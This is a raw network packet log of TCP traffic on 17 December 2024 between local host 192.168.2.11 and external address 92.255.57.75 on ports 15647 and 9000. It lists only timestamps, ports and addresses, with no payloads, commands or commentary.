Dec 17, 2024 08:40:11.121916056 CET	50035	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:11.122185946 CET	50035	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:11.200138092 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:11.200237989 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:11.210310936 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:11.210494041 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:11.241933107 CET	9000	50035	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:11.320012093 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:11.320071936 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:11.330298901 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:11.330348969 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:11.439796925 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:11.439958096 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:11.450141907 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:11.559772968 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:11.560288906 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:11.680139065 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:11.680273056 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:11.765599012 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:11.765726089 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:11.800152063 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:11.800337076 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:11.920082092 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:11.920270920 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:11.992398024 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:11.992548943 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:12.040056944 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:12.040206909 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:12.077600002 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:12.083831072 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:12.159921885 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:12.161341906 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:12.225403070 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:12.225533962 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:12.271414042 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:12.271528006 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:12.345284939 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:12.345434904 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:12.396136045 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:12.396754980 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:12.445844889 CET	9000	50035	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:12.445898056 CET	9000	50035	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:12.447906971 CET	50035	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:12.447906971 CET	50035	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:12.516580105 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:12.517024040 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:12.537816048 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:12.537928104 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:12.567711115 CET	9000	50035	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:12.567748070 CET	50041	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:12.633801937 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:12.635838032 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:12.657807112 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:12.657903910 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:12.688802004 CET	9000	50041	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:12.688914061 CET	50041	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:12.689181089 CET	50041	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:12.777942896 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:12.783787966 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:12.808923006 CET	9000	50041	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:12.826306105 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:12.826443911 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:12.946249008 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:12.946492910 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:12.948013067 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:13.065573931 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:13.065646887 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:13.095786095 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:13.099884033 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:13.258867979 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:13.259852886 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:13.345606089 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:13.455055952 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:13.457365036 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:13.533267021 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:13.537791014 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:13.537981987 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:13.653103113 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:13.655848980 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:13.773551941 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:13.773632050 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:13.775657892 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:13.893445015 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:13.895976067 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:13.944551945 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:13.967767954 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:13.968209028 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:13.991334915 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.010071993 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.015748024 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.015887976 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.016093016 CET	9000	50041	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.016249895 CET	9000	50041	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.016690016 CET	50041	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.018408060 CET	50041	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.035278082 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.053136110 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.064357996 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.067878008 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.083178043 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.085722923 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.087843895 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.104016066 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.111228943 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.111838102 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.128124952 CET	50047	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.129439116 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.129774094 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.131840944 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.135627985 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.135850906 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.138113022 CET	9000	50041	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.154645920 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.155148029 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.172939062 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.173048973 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.193888903 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.203000069 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.203223944 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.207556963 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.207751036 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.223810911 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.224354982 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.247112036 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.247788906 CET	9000	50047	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.247957945 CET	50047	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.249109030 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.250920057 CET	50047	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.251601934 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.256691933 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.260497093 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.274517059 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.275752068 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.300376892 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.313749075 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.315749884 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.322899103 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.323750973 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.344086885 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.345194101 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.347338915 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.347752094 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.366874933 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.367757082 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.370522976 CET	9000	50047	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.397197962 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.402578115 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.402703047 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.402934074 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.402934074 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.406261921 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.406358004 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.407752037 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.420141935 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.423754930 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.440781116 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.443402052 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.443491936 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.444597960 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.444689989 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.444828033 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.444828033 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.448826075 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.448904991 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.451754093 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.467776060 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.471750975 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.473109007 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.475593090 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.487917900 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.487992048 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.488101959 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.491897106 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.491945028 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.492011070 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.517013073 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.517167091 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.517750978 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.517812014 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.518588066 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.523053885 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.523226023 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.523303032 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.523395061 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.543515921 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.543929100 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.546430111 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.546503067 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.546811104 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.560633898 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.563944101 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.565130949 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.565242052 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.565361977 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.587721109 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.589906931 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.595254898 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.595343113 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.608382940 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.608434916 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.608438015 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.609141111 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.612329960 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.636997938 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.637052059 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.639947891 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.642461061 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.642570972 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.642678022 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.657224894 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.657740116 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.679960966 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.680053949 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.680111885 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.692437887 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.692554951 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.695754051 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.715012074 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.715205908 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.735800982 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.735882998 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.750406027 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.750518084 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.750550985 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.762383938 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.763088942 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.763101101 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.763154030 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.787966967 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.788078070 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.789946079 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.799931049 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.803850889 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.829035997 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.829144955 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.829150915 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.837747097 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.837816000 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.837946892 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.856013060 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.856091022 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.870270014 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.871853113 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.875977993 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.877859116 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.877935886 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.878082991 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.884299040 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.887852907 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.909590006 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.911940098 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.933828115 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.933921099 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.934102058 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.969929934 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.969971895 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.970024109 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.991846085 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.993066072 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:14.998537064 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.998584986 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:14.999237061 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.026873112 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.029628038 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.031270981 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.031351089 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.031569004 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.053821087 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.054373980 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.086031914 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.101892948 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.105667114 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.114968061 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.114984989 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.115339994 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.125793934 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.129249096 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.146697998 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.149794102 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.168160915 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.169357061 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.205816984 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.205898046 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.225538015 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.226332903 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.246198893 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.246570110 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.269588947 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.269680023 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.281826973 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.282016039 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.316606045 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.322967052 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.323111057 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.323270082 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.344510078 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.346116066 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.356332064 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.356430054 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.356430054 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.356493950 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.358993053 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.359078884 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.389504910 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.389645100 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.427234888 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.436403036 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.436850071 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.441803932 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.441957951 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.461745024 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.462172985 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.464318991 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.464481115 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.466658115 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.466797113 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.466867924 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.478871107 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.478975058 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.481324911 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.481376886 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.518138885 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.541229010 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.541367054 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.541480064 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.547111034 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.547856092 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.561755896 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.563908100 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.564148903 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.564217091 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.564266920 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.564620018 CET	50034	15647	192.168.2.11	92.255.57.75
